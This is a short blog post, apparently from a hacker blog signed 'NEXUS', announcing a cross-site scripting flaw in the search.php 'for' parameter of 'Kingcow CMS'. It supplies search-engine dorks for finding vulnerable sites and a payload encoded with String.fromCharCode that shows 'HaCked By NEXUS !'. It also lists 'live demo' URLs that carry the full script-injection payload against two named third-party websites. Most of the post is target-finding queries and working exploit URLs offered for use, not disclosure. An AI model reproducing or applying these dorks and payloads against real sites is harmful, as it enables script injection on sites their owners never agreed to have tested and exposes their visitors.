Home Unlabelled Kingcow CMS Cross Site Scripting

Kingcow CMS Cross Site Scripting

By
Tuesday, July 01, 2014
Read
Add Comment
Dorks:
inurl:"search.php?for="
intext:"Powered by Central" 
* for parameter in search.php is VULNERABLE to XSS..

Exploits:
">&search_submit=Search
Or if you can't use normal script.. Change it from string to character: 
">&search_submit=Search
 These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...



If you dont have that "Hack Bar" .. Download it from :
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS 
Tags :

Created By Nexus · Powered by Blogger
© All Rights Reserved

Terms Of Service · Privacy Policy · Disclaimer · Contact Us · About Us